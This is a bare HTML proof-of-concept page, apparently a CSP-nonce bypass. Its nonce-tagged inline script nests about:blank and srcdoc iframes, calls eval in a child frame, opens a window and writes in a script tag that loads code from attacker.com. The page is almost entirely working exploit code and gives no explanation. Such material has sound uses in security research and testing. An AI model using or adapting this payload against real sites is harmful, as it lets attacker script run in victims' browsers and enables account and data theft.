<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGktTsaGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGktTsaGGGGG.addEventListener("load",()=>{GGGGGktTsaGGGGG.srcdoc="<iframe id=GGGGktTsaGGGG src=about:blank><\/iframe><script>GGGGktTsaGGGG.onload=_=>GGGGktTsaGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGktTsaGGGG.contentWindow.location.reload();<\/script>";},{once:true});
};
</script>
</body>
</html>